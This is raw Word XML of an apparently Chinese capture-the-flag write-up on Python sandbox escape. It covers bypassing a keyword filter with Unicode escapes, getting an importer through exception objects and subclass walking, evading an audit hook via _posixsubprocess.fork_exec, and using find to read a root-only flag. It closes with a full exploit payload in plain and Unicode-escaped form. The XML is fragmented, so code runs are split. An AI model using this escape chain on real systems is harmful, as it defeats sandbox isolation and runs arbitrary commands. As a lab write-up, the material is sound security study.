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6009" w14:textId="7FB04337" w:rsidR="00EF7389" w:rsidRDefault="00AE5C33">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>沙箱逃逸</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C42A70" w14:textId="73D9DF94" w:rsidR="00AE5C33" w:rsidRDefault="00AE5C33">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一层绕过：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEAA7FA" w14:textId="03B1F635" w:rsidR="00AE5C33" w:rsidRDefault="00AE5C33">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D3EEF2C" wp14:editId="526A535C">
            <wp:extent cx="4133850" cy="704850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="175355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3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9C56" w14:textId="52F716FA" w:rsidR="00AE5C33" w:rsidRDefault="00AE5C33">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>禁止这些符号，源码中有</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704D39AA" w14:textId="30BBFF46" w:rsidR="00AE5C33" w:rsidRDefault="00AE5C33">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="373CDBEC" wp14:editId="34CDCF1E">
            <wp:extent cx="4962525" cy="266700"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="806084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84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24D4" w14:textId="3B0B24F9" w:rsidR="00AE5C33" w:rsidRDefault="00AE5C33">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Unicode解码，所以可以使用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绕过关键字检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB008FD" w14:textId="6A27F41B" w:rsidR="00AE5C33" w:rsidRDefault="00AE5C33">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第2层绕过：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C35D883" w14:textId="72A13FE3" w:rsidR="00AE5C33" w:rsidRDefault="00AE5C33">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F1CD696" wp14:editId="242F2A2F">
            <wp:extent cx="5274310" cy="1811020"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="681449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9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D80C" w14:textId="510B72F3" w:rsidR="00AE5C33" w:rsidRDefault="00AE5C33">
      <w:r w:rsidRPr="00AE5C33">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Python 的抽象语法树（AST，Abstract Syntax Tree）是一种用来表示 Python 源代码的树状结构。在这个树状结构中，每个节点都代表源代码中的一种结构，如一个函数调用、一个操作符、一个变量等。Python 的 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AE5C33">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AE5C33">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 模块提供了一种机制来解析 Python 源代码并生成这样的抽象语法树。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC203D1" w14:textId="6ABAA6A1" w:rsidR="00AE5C33" w:rsidRDefault="00AE5C33">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">如果你直接import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，会直接触发，不能显示使用，不过可以使用try catch通过报错获取对象，</w:t>
      </w:r>
      <w:r w:rsidR="00FD5881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不是我们自己导入的，是</w:t>
      </w:r>
      <w:r w:rsidR="00C6418B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>报错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统给的，这样子就能绕过。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ED7E8E" w14:textId="41623D11" w:rsidR="00AE5C33" w:rsidRDefault="00A57F69">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70CD899E" wp14:editId="2343DA98">
            <wp:extent cx="5274310" cy="1054735"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="989758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8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A87E" w14:textId="23E16A75" w:rsidR="00A57F69" w:rsidRDefault="00A57F69">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里面的a就是class的所有子类列表，然后遍历寻找模块，经查资料，可以使用以下类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF26AC8" w14:textId="6BC235EC" w:rsidR="00AE5C33" w:rsidRDefault="00A57F69">
      <w:r w:rsidRPr="00A57F69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;class '_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A57F69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>frozen_importlib.BuiltinImporter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A57F69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，该类下的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A57F69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__loader__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以当import使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C508702" w14:textId="0579CFE5" w:rsidR="00A57F69" w:rsidRDefault="00A57F69">
      <w:r w:rsidRPr="00A57F69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__loader__实际上指向的是 _</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A57F69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>frozen_importlib.BuiltinImporter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A57F69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是不知道它的位置，可以遍历获取</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E698DE7" w14:textId="19944F46" w:rsidR="00A57F69" w:rsidRDefault="00A57F69">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69B1F8BC" wp14:editId="3770448A">
            <wp:extent cx="5274310" cy="932180"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="1873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AF8" w14:textId="77777777" w:rsidR="00A57F69" w:rsidRPr="00A57F69" w:rsidRDefault="00A57F69" w:rsidP="00A57F69">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第3层绕过，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A57F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>audit hook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CF67A2" w14:textId="2DEE7556" w:rsidR="00A57F69" w:rsidRDefault="00A57F69"/>
    <w:p w14:paraId="5D5379B8" w14:textId="7CA45C60" w:rsidR="00A57F69" w:rsidRDefault="00A57F69">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4878CA35" wp14:editId="2C290C57">
            <wp:extent cx="5274310" cy="1114425"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="1611352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52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EE5B" w14:textId="25F29D9E" w:rsidR="00A57F69" w:rsidRDefault="00A57F69">
      <w:r w:rsidRPr="00A57F69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python 的审计事件包括一系列可能影响到 Python 程序运行安全性的重要操作。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个主要是列出允许的操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2DDAFC" w14:textId="2A63B547" w:rsidR="00A57F69" w:rsidRDefault="00C6418B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C6418B">
        <w:t>posixsubprocess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C6418B">
        <w:t xml:space="preserve"> 模块是 Python 的内部模块,模块核心功能是 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C6418B">
        <w:t>fork_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C6418B">
        <w:t xml:space="preserve"> 函数，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C6418B">
        <w:t>fork_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C6418B">
        <w:t xml:space="preserve"> 提供了一个非常底层的方式来创建一个新的子进程，并在这个新进程中执行一个指定的程序。但这个模块并没有在 Python 的标准库文档中列出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这句话大概的意思是它没有对这个模块的操作进行检查，绕过了</w:t>
      </w:r>
      <w:r w:rsidRPr="00A57F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>audit hook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D6874F" w14:textId="124A9F3C" w:rsidR="00C6418B" w:rsidRDefault="00C6418B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53CB6DE7" wp14:editId="1DB9CAEA">
            <wp:extent cx="5274310" cy="615950"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="944707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7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9A56" w14:textId="0B572FE9" w:rsidR="00C6418B" w:rsidRDefault="00C6418B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取到之后就可以引用该模块下的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C6418B">
        <w:t>fork_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6132985E" w14:textId="43598B83" w:rsidR="00C6418B" w:rsidRDefault="00C6418B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D49EEE3" wp14:editId="1447BF24">
            <wp:extent cx="5274310" cy="240030"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="127183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3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DB5E" w14:textId="5BE463E5" w:rsidR="00C6418B" w:rsidRDefault="00C6418B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63D93D14" wp14:editId="20090FE5">
            <wp:extent cx="4752975" cy="914400"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="172993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3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7BA5" w14:textId="7AC66702" w:rsidR="00C6418B" w:rsidRDefault="00C6418B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以将内容写入app.py,然后访问主目录就能访问的执行结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22276B50" w14:textId="103BCCCD" w:rsidR="00C6418B" w:rsidRDefault="00C6418B">
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="0063442B">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>http://127.0.0.1:55935/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="492A1FD9" w14:textId="2E8A200C" w:rsidR="00C6418B" w:rsidRDefault="00C6418B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03FC2CE0" wp14:editId="5265599A">
            <wp:extent cx="5274310" cy="494030"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="1607795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5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8427" w14:textId="17306650" w:rsidR="00C6418B" w:rsidRDefault="00C6418B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36D1D551" wp14:editId="2AB22652">
            <wp:extent cx="5274310" cy="2625725"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="1310039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39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2B23" w14:textId="2710C504" w:rsidR="00A57F69" w:rsidRDefault="00C6418B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后发现里面的flag文件只能root访问，根据上面，使用find提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560FAFC0" w14:textId="3FC54E46" w:rsidR="00C6418B" w:rsidRDefault="00C6418B">
      <w:r w:rsidRPr="00C6418B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>find / -name m1n1FL@G -exec cat {} \\;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57218B91" w14:textId="2BC92ED2" w:rsidR="00C6418B" w:rsidRDefault="00C6418B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问根网站，即可查看flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A91123E" w14:textId="03C46360" w:rsidR="00C6418B" w:rsidRDefault="00FD5881">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="202518AB" wp14:editId="76F4E032">
            <wp:extent cx="5274310" cy="5401310"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="1225793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93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EB1F" w14:textId="731184BF" w:rsidR="00FD5881" w:rsidRDefault="00FD5881">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Exp(记得将text里的代码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编码)；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CFF500" w14:textId="77777777" w:rsidR="00FD5881" w:rsidRDefault="00FD5881">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57F3212A" w14:textId="63383496" w:rsidR="00FD5881" w:rsidRDefault="00FD5881" w:rsidP="00FD5881">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>text=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254C2EE9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>try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B074A3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"{</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0._</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>_class_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>_._</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>_mro__[1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>]._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subclasses_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>_.l</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>".format</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(()) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7782CE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>except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E200C4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j = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A441035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a = e.obj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302E9327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while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D0071A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if '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BuiltinImporter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>' in f"{(a</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>()[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>j])}":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AD324F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   break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476FCD93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j = j + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272E682E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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5F7624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(a</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>()[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load</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>_module</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>('_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>posixsubprocess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>).syst</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B441D37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7F21B486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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B176819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b = e.obj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0164D1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b.fork_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>([b"/bin/bash","-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c","echo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> `find / -name m1n1FL@G -exec cat {} \\;`&gt;"+a()[j].</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>load_module</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>('sys').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[0]], [b"/bin/bash"], True, (), None, None, -1, -1, -1, -1, -1, -1, *(a()[j].</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>load_module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').pipe()), False, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>False,False</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>, None, None, None, -1, None, False))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8588AF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69D9647C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  pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F0CAC1" w14:textId="77777777" w:rsidR="00FD5881" w:rsidRDefault="00FD5881" w:rsidP="00FD5881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6016FACC" w14:textId="579F228E" w:rsidR="00FD5881" w:rsidRPr="00C6418B" w:rsidRDefault="00FD5881" w:rsidP="00FD588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      k = e.obj#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1206E5E4" w14:textId="749E1073" w:rsidR="00FD5881" w:rsidRDefault="00FD5881"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版：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41938A22" w14:textId="77777777" w:rsidR="00FD5881" w:rsidRDefault="00FD5881">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22509FBA" w14:textId="4495A4A2" w:rsidR="00FD5881" w:rsidRDefault="00FD5881">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>text=</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD5881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\u0022\u0029\u000a\u0074\u0072\u0079\u003a\u000a\u0020\u0020\u0022\u007b\u0030\u002e\u005f\u005f\u0063\u006c\u0061\u0073\u0073\u005f\u005f\u002e\u005f\u005f\u006d\u0072\u006f\u005f\u005f\u005b\u0031\u005d\u002e\u005f\u005f\u0073\u0075\u0062\u0063\u006c\u0061\u0073\u0073\u0065\u0073\u005f\u005f\u002e\u006c\u007d\u0022\u002e\u0066\u006f\u0072\u006d\u0061\u0074\u0028\u0028\u0029\u0029\u0020\u000a\u0065\u0078\u0063\u0065\u0070\u0074\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0061\u0073\u0020\u0065\u003a\u000a\u0020\u0020\u006a\u0020\u003d\u0020\u0030\u000a\u0020\u0020\u0061\u0020\u003d\u0020\u0065\u002e\u006f\u0062\u006a\u000a\u0020\u0020\u0077\u0068\u0069\u006c\u0065\u0020\u0054\u0072\u0075\u0065\u003a\u000a\u0020\u0020\u0020\u0020\u0069\u0066\u0020\u0027\u0042\u0075\u0069\u006c\u0074\u0069\u006e\u0049\u006d\u0070\u006f\u0072\u0074\u0065\u0072\u0027\u0020\u0069\u006e\u0020\u0066\u0022\u007b\u0028\u0061\u0028\u0029\u005b\u006a\u005d\u0029\u007d\u0022\u003a\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0062\u0072\u0065\u0061\u006b\u000a\u0020\u0020\u0020\u0020\u006a\u0020\u003d\u0020\u006a\u0020\u002b\u0020\u0031\u000a\u0020\u0020\u0074\u0072\u0079\u003a\u000a\u0020\u0020\u0020\u0020\u0028\u0061\u0028\u0029\u005b\u006a\u005d\u002e\u006c\u006f\u0061\u0064\u005f\u006d\u006f\u0064\u0075\u006c\u0065\u0028\u0027\u005f\u0070\u006f\u0073\u0069\u0078\u0073\u0075\u0062\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u0027\u0029\u002e\u0073\u0079\u0073\u0074\u0028\u0029\u0029\u000a\u0020\u0020\u0020\u0020\u000a\u0020\u0020\u0065\u0078\u0063\u0065\u0070\u0074\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0061\u0073\u0020\u0065\u003a\u000a\u0020\u0020\u0020\u0020\u0062\u0020\u003d\u0020\u0065\u002e\u006f\u0062\u006a\u000a\u0020\u0020\u0020\u0020\u0070\u0072\u0069\u006e\u0074\u0028\u0062\u002e\u0066\u006f\u0072\u006b\u005f\u0065\u0078\u0065\u0063\u0028\u005b\u0062\u0022\u002f\u0062\u0069\u006e\u002f\u0062\u0061\u0073\u0068\u0022\u002c\u0022\u002d\u0063\u0022\u002c\u0022\u0065\u0063\u0068\u006f\u0020\u0060\u0066\u0069\u006e\u0064\u0020\u002f\u0020\u002d\u006e\u0061\u006d\u0065\u0020\u006d\u0031\u006e\u0031\u0046\u004c\u0040\u0047\u0020\u002d\u0065\u0078\u0065\u0063\u0020\u0063\u0061\u0074\u0020\u007b\u007d\u0020\u005c\u005c\u003b\u0060\u003e\u0022\u002b\u0061\u0028\u0029\u005b\u006a\u005d\u002e\u006c\u006f\u0061\u0064\u005f\u006d\u006f\u0064\u0075\u006c\u0065\u0028\u0027\u0073\u0079\u0073\u0027\u0029\u002e\u0061\u0072\u0067\u0076\u005b\</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD5881">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
